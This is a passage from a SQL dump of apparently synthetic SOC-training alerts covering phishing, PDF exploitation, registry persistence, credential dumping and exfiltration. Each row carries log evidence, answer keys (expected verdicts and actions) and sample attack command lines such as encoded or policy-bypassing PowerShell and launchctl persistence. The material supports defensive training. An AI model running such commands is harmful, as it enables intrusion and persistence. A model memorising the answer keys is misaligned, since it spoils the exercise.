3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-05T14:23:34Z\\\",\\\"device_id\\\":\\\"device_12345\\\",\\\"user\\\":\\\"jdoe\\\",\\\"source_ip\\\":\\\"192.168.1.15\\\",\\\"malicious_ip\\\":\\\"203.0.113.45\\\",\\\"file_created\\\":\\\"/Library/LaunchAgents/com.example.malicious.plist\\\",\\\"hash\\\":\\\"a6b1c1c68cfe5b9d1e0e4d5b6f2c3a8f\\\",\\\"action\\\":\\\"script_execution\\\",\\\"description\\\":\\\"A script was executed to create a LaunchAgent for persistence.\\\",\\\"command\\\":\\\"launchctl load -w /Library/LaunchAgents/com.example.malicious.plist\\\"}\"},{\"timestamp\":\"2026-02-01T20:28:22.764Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-05T14:23:34Z\\\",\\\"device_id\\\":\\\"device_12345\\\",\\\"user\\\":\\\"jdoe\\\",\\\"source_ip\\\":\\\"192.168.1.15\\\",\\\"malicious_ip\\\":\\\"203.0.113.45\\\",\\\"file_created\\\":\\\"/Library/LaunchAgents/com.example.malicious.plist\\\",\\\"hash\\\":\\\"a6b1c1c68cfe5b9d1e0e4d5b6f2c3a8f\\\",\\\"action\\\":\\\"script_execution\\\",\\\"description\\\":\\\"A script was executed to create a LaunchAgent for persistence.\\\",\\\"command\\\":\\\"launchctl load -w /Library/LaunchAgents/com.example.malicious.plist\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(1065, 'Alert: Unusual Data Traffic Detected', 'high', 'Network Traffic Analysis', 'Unusual outbound traffic detected from internal host to known malicious IP. Data exfiltration suspected.', 'Exfiltration', 'T1048 - Exfiltration Over Alternative Protocol', 1, 'new', NULL, '{\"timestamp\":\"2023-10-05T14:22:30Z\",\"source_ip\":\"192.168.1.45\",\"destination_ip\":\"203.0.113.76\",\"destination_port\":8080,\"protocol\":\"HTTP\",\"filename\":\"sensitive_data.zip\",\"file_hash\":\"e99a18c428cb38d5f260853678922e03\",\"username\":\"jdoe\",\"action\":\"exfiltration\",\"bytes_sent\":5242880}', '2026-01-24 03:33:29', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.1.45\",\"is_critical\":false,\"osint_result\":{\"source\":\"internal logs\",\"verdict\":\"internal\",\"details\":\"Internal IP address of compromised host\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"203.0.113.76\",\"is_critical\":true,\"osint_result\":{\"source\":\"threat intelligence\",\"verdict\":\"malicious\",\"details\":\"IP address associated with known APT group\"}},{\"id\":\"artifact_3\",\"type\":\"filename\",\"value\":\"sensitive_data.zip\",\"is_critical\":true,\"osint_result\":{\"source\":\"file analysis\",\"verdict\":\"suspicious\",\"details\":\"File contains sensitive information\"}},{\"id\":\"artifact_4\",\"type\":\"hash\",\"value\":\"e99a18c428cb38d5f260853678922e03\",\"is_critical\":true,\"osint_result\":{\"source\":\"hash database\",\"verdict\":\"suspicious\",\"details\":\"Hash matches known exfiltration tool\"}},{\"id\":\"artifact_5\",\"type\":\"username\",\"value\":\"jdoe\",\"is_critical\":false,\"osint_result\":{\"source\":\"internal directory\",\"verdict\":\"internal\",\"details\":\"Username associated with compromised account\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'beginner', 'NDR', 1, 0, NULL, NULL, NULL, '{\"tool\":\"Firewall\",\"evidence\":{\"policy_name\":\"Block_Outbound_Direct_IP\",\"action\":\"ALLOW\",\"interface_in\":\"eth0\",\"interface_out\":\"eth1\",\"packets\":[{\"time\":\"10:00:01\",\"src\":\"10.0.0.5\",\"dst\":\"8.8.8.8\",\"proto\":\"UDP\",\"port\":53,\"size\":120,\"action\":\"ALLOW\"},{\"time\":\"10:00:02\",\"src\":\"10.0.0.5\",\"dst\":\"203.0.113.15\",\"proto\":\"TCP\",\"port\":443,\"size\":1500,\"action\":\"ALLOW\",\"alert\":true}]}}', 0),
(1066, 'Suspicious Email Phishing Campaign Detected', 'high', 'Email gateway logs', 'APT1 has initiated a spear-phishing campaign targeting corporate employees. The phishing emails contain a malicious attachment disguised as a legitimate document.', 'Initial Access', 'T1566.001', 1, 'new', NULL, '{\"timestamp\":\"2023-10-05T14:48:00Z\",\"source_ip\":\"203.0.113.45\",\"destination_ip\":\"192.168.1.10\",\"source_email\":\"john.doe@maliciousdomain.com\",\"destination_email\":\"employee@company.com\",\"subject\":\"Urgent: Action Required\",\"attachment\":\"Invoice_2023.docx\",\"attachment_hash\":\"e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855\",\"user_agent\":\"Mozilla/5.0 (Windows NT 10.0; Win64; x64)\",\"message_id\":\"<20231005144800.1a2bc34d@example.com>\"}', '2026-01-24 03:35:49', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Database\",\"verdict\":\"malicious\",\"details\":\"IP associated with known phishing activities.\"}},{\"id\":\"artifact_2\",\"type\":\"email\",\"value\":\"john.doe@maliciousdomain.com\",\"is_critical\":true,\"osint_result\":{\"source\":\"Email Reputation Service\",\"verdict\":\"malicious\",\"details\":\"Email used in multiple phishing campaigns.\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"suspicious\",\"details\":\"Hash matches known malicious document.\"}},{\"id\":\"artifact_4\",\"type\":\"filename\",\"value\":\"Invoice_2023.docx\",\"is_critical\":false,\"osint_result\":{\"source\":\"File Analysis Service\",\"verdict\":\"suspicious\",\"details\":\"Filename commonly used in phishing attempts.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"]}', 'intermediate', 'TI', 1, 0, NULL, NULL, NULL, '{\"tool\":\"Mail\",\"evidence\":{\"headers\":{\"from\":\"urgent@support-microsoft-update.com\",\"to\":\"employee@company.com\",\"subject\":\"Suspicious Email Phishing Campaign Detected\",\"date\":\"2026-02-01T20:32:22.767Z\",\"x-mailer\":\"PHPMailer 6.0\"},\"attachments\":[{\"name\":\"invoice_feb.pdf.exe\",\"size\":\"1.2MB\",\"type\":\"application/x-msdos-program\",\"verdict\":\"Malicious\"}],\"body_preview\":\"Dear User, please check the attached invoice immediately...\",\"security_check\":\"FAIL - SPF/DKIM Mismatch\"}}', 0),
(1067, 'Remote Code Execution via Malicious PDF', 'high', 'Endpoint detection and response (EDR) logs', 'An unsuspecting employee opened a PDF attachment, triggering a hidden script that executed malware, establishing a foothold for APT1. The PDF was designed to exploit a vulnerability in the PDF reader, allowing remote code execution.', 'Execution', 'T1203 - Exploitation for Client Execution', 1, 'new', NULL, '{\"timestamp\":\"2023-09-15T14:25:36Z\",\"host_ip\":\"192.168.1.45\",\"user\":\"jdoe\",\"filename\":\"Quarterly_Report_Q3_2023.pdf\",\"hash\":\"3a5f5d4c77b4e5a5e8d3c3e28f6a5b0d\",\"process\":\"pdfreader.exe\",\"action\":\"execute\",\"remote_ip\":\"203.0.113.45\",\"malware_name\":\"APT1_Payload\",\"indicators\":{\"external_ip\":\"203.0.113.45\",\"file_hash\":\"3a5f5d4c77b4e5a5e8d3c3e28f6a5b0d\"}}', '2026-01-24 03:35:49', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Platform\",\"verdict\":\"malicious\",\"details\":\"IP associated with known APT1 activity.\"}},{\"id\":\"artifact_2\",\"type\":\"hash\",\"value\":\"3a5f5d4c77b4e5a5e8d3c3e28f6a5b0d\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"File hash associated with APT1 malware payload.\"}},{\"id\":\"artifact_3\",\"type\":\"filename\",\"value\":\"Quarterly_Report_Q3_2023.pdf\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Database\",\"verdict\":\"suspicious\",\"details\":\"Filename used in multiple phishing campaigns.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'intermediate', 'MAL', 1, 0, NULL, NULL, NULL, '{\"tool\":\"EDR\",\"evidence\":{\"hostname\":\"WORKSTATION-01\",\"os\":\"Windows 10 Enterprise\",\"agent_version\":\"7.12.0\",\"process_tree\":[{\"id\":100,\"name\":\"explorer.exe\",\"pid\":4520,\"user\":\"jdoe\",\"cmd\":\"explorer.exe\",\"integrity\":\"Medium\",\"children\":[101]},{\"id\":101,\"name\":\"powershell.exe\",\"pid\":5100,\"user\":\"jdoe\",\"cmd\":\"powershell.exe -nop -enc AAB...\",\"integrity\":\"High\",\"children\":[102],\"highlight\":true},{\"id\":102,\"name\":\"conhost.exe\",\"pid\":5101,\"user\":\"jdoe\",\"cmd\":\"conhost.exe\",\"integrity\":\"High\",\"children\":[]}],\"network_connections\":[{\"pid\":5100,\"remote_ip\":\"203.0.113.55\",\"port\":443,\"state\":\"ESTABLISHED\",\"process\":\"powershell.exe\"}]}}', 0),
(1068, 'Persistence Achieved Through Registry Modification', 'high', 'Registry audit logs', 'APT1 has modified registry settings to ensure their malware persists through system reboots. This action was detected based on unusual registry key changes associated with persistence techniques.', 'Persistence', 'T1547.001', 1, 'new', NULL, '{\"timestamp\":\"2023-10-05T13:45:00Z\",\"event_id\":4657,\"computer_name\":\"compromised-host.local\",\"user\":\"malicious_user\",\"registry_key_path\":\"HKEY_LOCAL_MACHINE\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\\",\"registry_key_value\":\"MaliciousProgram\",\"registry_key_data\":\"C:\\\\Users\\\\malicious_user\\\\AppData\\\\Local\\\\Temp\\\\malware.exe\",\"source_ip\":\"203.0.113.45\",\"internal_ip\":\"192.168.1.105\",\"hash\":\"3a7bd3b6f9c3c5e2d2c8f5b6a7c9e1f2\",\"user_sid\":\"S-1-5-21-3141592653-589793238-462643383\"}', '2026-01-24 03:35:49', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Platform\",\"verdict\":\"malicious\",\"details\":\"Known IP associated with APT1 activities.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.1.105\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal IP address of compromised host.\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"3a7bd3b6f9c3c5e2d2c8f5b6a7c9e1f2\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Hash matches known APT1 malware sample.\"}},{\"id\":\"artifact_5\",\"type\":\"username\",\"value\":\"malicious_user\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal Audit\",\"verdict\":\"suspicious\",\"details\":\"User involved in unauthorized registry modifications.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'intermediate', 'MAL', 1, 0, NULL, NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-01T20:32:22.770Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-05T13:45:00Z\\\",\\\"event_id\\\":4657,\\\"computer_name\\\":\\\"compromised-host.local\\\",\\\"user\\\":\\\"malicious_user\\\",\\\"registry_key_path\\\":\\\"HKEY_LOCAL_MACHINE\\\\\\\\Software\\\\\\\\Microsoft\\\\\\\\Windows\\\\\\\\CurrentVersion\\\\\\\\Run\\\\\\\\\\\",\\\"registry_key_value\\\":\\\"MaliciousProgram\\\",\\\"registry_key_data\\\":\\\"C:\\\\\\\\Users\\\\\\\\malicious_user\\\\\\\\AppData\\\\\\\\Local\\\\\\\\Temp\\\\\\\\malware.exe\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"internal_ip\\\":\\\"192.168.1.105\\\",\\\"hash\\\":\\\"3a7bd3b6f9c3c5e2d2c8f5b6a7c9e1f2\\\",\\\"user_sid\\\":\\\"S-1-5-21-3141592653-589793238-462643383\\\"}\"},{\"timestamp\":\"2026-02-01T20:31:22.770Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-05T13:45:00Z\\\",\\\"event_id\\\":4657,\\\"computer_name\\\":\\\"compromised-host.local\\\",\\\"user\\\":\\\"malicious_user\\\",\\\"registry_key_path\\\":\\\"HKEY_LOCAL_MACHINE\\\\\\\\Software\\\\\\\\Microsoft\\\\\\\\Windows\\\\\\\\CurrentVersion\\\\\\\\Run\\\\\\\\\\\",\\\"registry_key_value\\\":\\\"MaliciousProgram\\\",\\\"registry_key_data\\\":\\\"C:\\\\\\\\Users\\\\\\\\malicious_user\\\\\\\\AppData\\\\\\\\Local\\\\\\\\Temp\\\\\\\\malware.exe\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"internal_ip\\\":\\\"192.168.1.105\\\",\\\"hash\\\":\\\"3a7bd3b6f9c3c5e2d2c8f5b6a7c9e1f2\\\",\\\"user_sid\\\":\\\"S-1-5-21-3141592653-589793238-462643383\\\"}\"},{\"timestamp\":\"2026-02-01T20:30:22.770Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-05T13:45:00Z\\\",\\\"event_id\\\":4657,\\\"computer_name\\\":\\\"compromised-host.local\\\",\\\"user\\\":\\\"malicious_user\\\",\\\"registry_key_path\\\":\\\"HKEY_LOCAL_MACHINE\\\\\\\\Software\\\\\\\\Microsoft\\\\\\\\Windows\\\\\\\\CurrentVersion\\\\\\\\Run\\\\\\\\\\\",\\\"registry_key_value\\\":\\\"MaliciousProgram\\\",\\\"registry_key_data\\\":\\\"C:\\\\\\\\Users\\\\\\\\malicious_user\\\\\\\\AppData\\\\\\\\Local\\\\\\\\Temp\\\\\\\\malware.exe\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"internal_ip\\\":\\\"192.168.1.105\\\",\\\"hash\\\":\\\"3a7bd3b6f9c3c5e2d2c8f5b6a7c9e1f2\\\",\\\"user_sid\\\":\\\"S-1-5-21-3141592653-589793238-462643383\\\"}\"},{\"timestamp\":\"2026-02-01T20:29:22.770Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-05T13:45:00Z\\\",\\\"event_id\\\":4657,\\\"computer_name\\\":\\\"compromised-host.local\\\",\\\"user\\\":\\\"malicious_user\\\",\\\"registry_key_path\\\":\\\"HKEY_LOCAL_MACHINE\\\\\\\\Software\\\\\\\\Microsoft\\\\\\\\Windows\\\\\\\\CurrentVersion\\\\\\\\Run\\\\\\\\\\\",\\\"registry_key_value\\\":\\\"MaliciousProgram\\\",\\\"registry_key_data\\\":\\\"C:\\\\\\\\Users\\\\\\\\malicious_user\\\\\\\\AppData\\\\\\\\Local\\\\\\\\Temp\\\\\\\\malware.exe\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"internal_ip\\\":\\\"192.168.1.105\\\",\\\"hash\\\":\\\"3a7bd3b6f9c3c5e2d2c8f5b6a7c9e1f2\\\",\\\"user_sid\\\":\\\"S-1-5-21-3141592653-589793238-462643383\\\"}\"},{\"timestamp\":\"2026-02-01T20:28:22.770Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-05T13:45:00Z\\\",\\\"event_id\\\":4657,\\\"computer_name\\\":\\\"compromised-host.local\\\",\\\"user\\\":\\\"malicious_user\\\",\\\"registry_key_path\\\":\\\"HKEY_LOCAL_MACHINE\\\\\\\\Software\\\\\\\\Microsoft\\\\\\\\Windows\\\\\\\\CurrentVersion\\\\\\\\Run\\\\\\\\\\\",\\\"registry_key_value\\\":\\\"MaliciousProgram\\\",\\\"registry_key_data\\\":\\\"C:\\\\\\\\Users\\\\\\\\malicious_user\\\\\\\\AppData\\\\\\\\Local\\\\\\\\Temp\\\\\\\\malware.exe\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"internal_ip\\\":\\\"192.168.1.105\\\",\\\"hash\\\":\\\"3a7bd3b6f9c3c5e2d2c8f5b6a7c9e1f2\\\",\\\"user_sid\\\":\\\"S-1-5-21-3141592653-589793238-462643383\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(1069, 'Credential Dumping Detected in Lateral Movement', 'high', 'Network traffic analysis', 'APT1 uses harvested credentials to move laterally within the network, searching for systems containing valuable data. Network traffic analysis detected unusual authentication patterns involving known malicious IP addresses and suspicious file transfers.', 'Lateral Movement', 'T1003.001', 1, 'new', NULL, '{\"timestamp\":\"2023-10-15T14:32:07Z\",\"src_ip\":\"203.0.113.45\",\"dst_ip\":\"10.0.5.23\",\"action\":\"credential_dumping\",\"user\":\"jdoe\",\"process\":{\"name\":\"lsass.exe\",\"hash\":\"3f6a9d8ec3a7b8e7f5c6d4b9a1e2f3f4\"},\"file\":{\"name\":\"creddump.exe\",\"path\":\"C:\\\\Temp\\\\creddump.exe\"},\"indicators\":{\"malicious_ip\":\"203.0.113.45\",\"malicious_hash\":\"3f6a9d8ec3a7b8e7f5c6d4b9a1e2f3f4\"}}', '2026-01-24 03:35:49', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Platform\",\"verdict\":\"malicious\",\"details\":\"Known IP associated with APT1 activities.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"10.0.5.23\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal IP address of compromised host.\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"3f6a9d8ec3a7b8e7f5c6d4b9a1e2f3f4\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Malicious hash associated with credential dumping tools.\"}},{\"id\":\"artifact_4\",\"type\":\"filename\",\"value\":\"creddump.exe\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Detection\",\"verdict\":\"suspicious\",\"details\":\"Suspicious file used for dumping credentials.\"}},{\"id\":\"artifact_5\",\"type\":\"username\",\"value\":\"jdoe\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Compromised user account involved in the activity.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"]}', 'intermediate', 'TI', 1, 0, NULL, NULL, NULL, '{\"tool\":\"Firewall\",\"evidence\":{\"policy_name\":\"Block_Outbound_Direct_IP\",\"action\":\"ALLOW\",\"interface_in\":\"eth0\",\"interface_out\":\"eth1\",\"packets\":[{\"time\":\"10:00:01\",\"src\":\"10.0.0.5\",\"dst\":\"8.8.8.8\",\"proto\":\"UDP\",\"port\":53,\"size\":120,\"action\":\"ALLOW\"},{\"time\":\"10:00:02\",\"src\":\"10.0.0.5\",\"dst\":\"203.0.113.15\",\"proto\":\"TCP\",\"port\":443,\"size\":1500,\"action\":\"ALLOW\",\"alert\":true}]}}', 0),
(1070, 'Data Exfiltration via Encrypted Channels', 'high', 'Outbound network traffic logs', 'In the final phase of their operation, APT1 successfully exfiltrated sensitive intellectual property using encrypted channels to avoid detection. The malicious traffic was identified originating from an internal host and directed towards a known malicious IP address.', 'Exfiltration', 'T1048.003 - Exfiltration Over Unencrypted/Encrypted Non-C2 Protocol', 1, 'new', NULL, '{\"timestamp\":\"2023-10-19T23:45:00Z\",\"src_ip\":\"192.168.15.42\",\"dst_ip\":\"203.0.113.45\",\"protocol\":\"TLS\",\"port\":443,\"bytes_sent\":5242880,\"user\":\"jdoe\",\"file_hash\":\"fa6a1c1d3e4f5g6h7i8j9k0l1m2n3o4p5q6r7s8t9u0v1w2x3y4z5\",\"filename\":\"Q3ResearchResults.pdf\",\"action\":\"allowed\",\"encrypted\":true}', '2026-01-24 03:35:49', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.15.42\",\"is_critical\":true,\"osint_result\":{\"source\":\"internal_network\",\"verdict\":\"internal\",\"details\":\"Internal host involved in data exfiltration.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"threat_intel\",\"verdict\":\"malicious\",\"details\":\"Known malicious IP associated with APT1 operations.\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"fa6a1c1d3e4f5g6h7i8j9k0l1m2n3o4p5q6r7s8t9u0v1w2x3y4z5\",\"is_critical\":false,\"osint_result\":{\"source\":\"hash_database\",\"verdict\":\"suspicious\",\"details\":\"File hash related to potentially sensitive data.\"}},{\"id\":\"artifact_4\",\"type\":\"filename\",\"value\":\"Q3ResearchResults.pdf\",\"is_critical\":false,\"osint_result\":{\"source\":\"internal_documentation\",\"verdict\":\"clean\",\"details\":\"Internal document containing sensitive research data.\"}},{\"id\":\"artifact_5\",\"type\":\"username\",\"value\":\"jdoe\",\"is_critical\":false,\"osint_result\":{\"source\":\"internal_user_directory\",\"verdict\":\"internal\",\"details\":\"User with access to sensitive data.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"collect_forensics\",\"escalate\"]}', 'intermediate', 'TI', 1, 0, NULL, NULL, NULL, '{\"tool\":\"Firewall\",\"evidence\":{\"policy_name\":\"Block_Outbound_Direct_IP\",\"action\":\"ALLOW\",\"interface_in\":\"eth0\",\"interface_out\":\"eth1\",\"packets\":[{\"time\":\"10:00:01\",\"src\":\"10.0.0.5\",\"dst\":\"8.8.8.8\",\"proto\":\"UDP\",\"port\":53,\"size\":120,\"action\":\"ALLOW\"},{\"time\":\"10:00:02\",\"src\":\"10.0.0.5\",\"dst\":\"203.0.113.15\",\"proto\":\"TCP\",\"port\":443,\"size\":1500,\"action\":\"ALLOW\",\"alert\":true}]}}', 0),
(1071, 'Unusual Network Traffic Detected', 'medium', 'Network Intrusion Detection System (NIDS)', 'Initial signs of compromise detected as malware attempts to establish a connection with the GSM infrastructure. The traffic pattern suggests an attempt to gain a foothold in the GSM base station network.', 'Initial Access', 'T1078 - Valid Accounts', 1, 'new', NULL, '{\"timestamp\":\"2023-10-15T08:23:45Z\",\"source_ip\":\"45.77.123.88\",\"destination_ip\":\"10.0.5.23\",\"alert\":\"Unusual connection attempt to internal GSM network\",\"detected_protocol\":\"TCP\",\"detected_port\":8080,\"malware_hash\":\"5d41402abc4b2a76b9719d911017c592\",\"username\":\"gsm_operator\",\"file_name\":\"gsm_connect.exe\",\"session_id\":\"abc123def456\",\"additional_info\":{\"geo_location\":\"Outside Corporate HQ\",\"previous_connection\":false}}', '2026-01-24 03:35:57', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"45.77.123.88\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Database\",\"verdict\":\"malicious\",\"details\":\"Known IP address associated with previous cyber attacks.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"10.0.5.23\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal GSM base station.\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"5d41402abc4b2a76b9719d911017c592\",\"is_critical\":true,\"osint_result\":{\"source\":\"Malware Database\",\"verdict\":\"malicious\",\"details\":\"Hash associated with known malware targeting GSM networks.\"}},{\"id\":\"artifact_4\",\"type\":\"username\",\"value\":\"gsm_operator\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Database\",\"verdict\":\"internal\",\"details\":\"Valid username within the organization.\"}},{\"id\":\"artifact_5\",\"type\":\"filename\",\"value\":\"gsm_connect.exe\",\"is_critical\":true,\"osint_result\":{\"source\":\"File Analysis\",\"verdict\":\"malicious\",\"details\":\"Executable associated with malicious activity targeting GSM infrastructure.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'intermediate', 'MAL', 1, 0, NULL, NULL, NULL, '{\"tool\":\"Firewall\",\"evidence\":{\"policy_name\":\"Block_Outbound_Direct_IP\",\"action\":\"ALLOW\",\"interface_in\":\"eth0\",\"interface_out\":\"eth1\",\"packets\":[{\"time\":\"10:00:01\",\"src\":\"10.0.0.5\",\"dst\":\"8.8.8.8\",\"proto\":\"UDP\",\"port\":53,\"size\":120,\"action\":\"ALLOW\"},{\"time\":\"10:00:02\",\"src\":\"10.0.0.5\",\"dst\":\"203.0.113.15\",\"proto\":\"TCP\",\"port\":443,\"size\":1500,\"action\":\"ALLOW\",\"alert\":true}]}}', 0),
(1072, 'Suspicious File Execution', 'high', 'Endpoint Detection and Response (EDR)', 'The malware begins executing its components, signaling the start of its multi-stage architecture. A suspicious executable was detected running on the system, which matches known malicious behavior patterns.', 'Execution', 'T1059.001 - Command and Scripting Interpreter: PowerShell', 1, 'new', NULL, '{\"timestamp\":\"2023-10-14T11:35:27Z\",\"event_id\":\"4624\",\"computer_name\":\"DESKTOP-8G1F2KS\",\"user\":\"john.doe\",\"process_name\":\"C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\",\"command_line\":\"powershell.exe -ExecutionPolicy Bypass -File C:\\\\Users\\\\john.doe\\\\AppData\\\\Local\\\\Temp\\\\malicious_script.ps1\",\"file_hash\":\"b1946ac92492d2347c6235b4d2611184\",\"source_ip\":\"192.168.1.15\",\"destination_ip\":\"203.0.113.50\",\"file_name\":\"malicious_script.ps1\"}', '2026-01-24 03:35:57', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"hash\",\"value\":\"b1946ac92492d2347c6235b4d2611184\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"File hash is associated with known malware.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"203.0.113.50\",\"is_critical\":true,\"osint_result\":{\"source\":\"AlienVault OTX\",\"verdict\":\"malicious\",\"details\":\"IP address is listed as part of a C2 network.\"}},{\"id\":\"artifact_3\",\"type\":\"filename\",\"value\":\"malicious_script.ps1\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal Threat Database\",\"verdict\":\"malicious\",\"details\":\"Filename matches known threat indicator.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'intermediate', 'MAL', 1, 0, NULL, NULL, NULL, '{\"tool\":\"EDR\",\"evidence\":{\"hostname\":\"WORKSTATION-01\",\"os\":\"Windows 10 